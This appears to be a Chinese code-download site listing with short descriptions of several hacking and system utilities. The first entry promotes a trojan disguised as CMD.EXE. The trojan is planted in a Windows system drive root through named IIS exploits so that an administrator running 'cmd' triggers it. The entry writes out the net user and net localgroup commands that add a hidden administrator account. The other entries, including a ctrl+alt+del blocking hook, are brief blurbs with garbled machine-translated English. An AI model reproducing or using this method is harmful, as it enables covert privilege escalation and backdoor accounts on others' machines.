-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
Java实现网络监听
Java实现网络监听-Java Network Monitoring
- 2023-05-12 10:55:03下载
- 积分:1
-
自动登陆NT内核操作系统
自动登陆NT内核操作系统-automatic landing NT operating system kernel
- 2022-04-10 15:12:17下载
- 积分:1
-
运行程序杀手关闭正在运行的程序.自己可以选择
运行程序杀手关闭正在运行的程序.自己可以选择-Killer run the program shut down running programs. They can choose
- 2022-01-26 05:40:10下载
- 积分:1
-
系统信息获取,内容十分全,是新手学习不错的选择
系统信息获取,内容十分全,是新手学习不错的选择-system information access, which is very long, greenhorn learning bad choice
- 2023-08-25 13:55:04下载
- 积分:1
-
winshe
winshe-winshell winshe
- 2022-03-15 00:28:33下载
- 积分:1
-
拖动程序内的图标得到窗口的handle,class,text,parent,颜色,windows 类...
拖动程序内的图标得到窗口的handle,class,text,parent,颜色,windows 类-Drag the icon procedures to be a window handle, class, text, parent, colors, windows category
- 2023-06-26 21:50:03下载
- 积分:1
-
局域网或者虚拟网络配置指令和相关技术
局域网或者虚拟网络配置指令和相关技术-LAN or virtual network configuration directive and related technology
- 2022-02-02 23:27:33下载
- 积分:1
-
ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx
VB中可直接引用的ping.ocx控件,可返回不同参数。-ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx ping.ocx
- 2022-01-25 21:54:50下载
- 积分:1
-
一个用hook写的屏蔽ctrl+alt+del的小程序
一个用hook写的屏蔽ctrl+alt+del的小程序-a hook was used to shield the ctrl alt del small programs
- 2023-06-04 00:15:02下载
- 积分:1
